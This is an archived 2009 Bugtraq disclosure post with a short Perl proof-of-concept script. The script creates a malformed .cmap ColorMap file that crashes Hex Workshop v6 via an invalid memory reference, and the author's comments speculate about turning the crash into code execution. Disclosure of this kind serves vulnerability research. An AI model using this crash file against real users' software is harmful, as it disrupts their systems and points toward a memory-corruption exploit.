lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090203153937.30160.qmail@securityfocus.com>
Date: 3 Feb 2009 15:39:37 -0000
From: xhakerman2006@...oo.com
To: bugtraq@...urityfocus.com
Subject: Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference
 crash POC

#!/usr/bin/perl -w
# Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference crash POC
# Discovred by : DATA_SNIPER
# for more information vist my blog:http://datasniper.arab4services.net/
# the Exploit it's  very hard to implemented,if we can make the "reference" point to  valid memory location contain
# unicode string we can corrupt the memory and get code execution(it's not so easy as you can see,try it manually in olly).
print "==========================================================================\n";
print "Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash POC\n";
print "Discovred by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "===================================================================== \n";
my $crash = '#Simple POC by DATA_SNIPER'."\n".'"%s"= RGB(0, 0, 0)'; #don't worry about it ,it's not Format string bug :)
my $file = "cr4sh.cmap" ;
open(my $data, ">>$file") or die "Cannot open $file";
print $data $crash;
close($data);
print "$file has been created\n";
print "open it in HexWorkshop.\n";

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ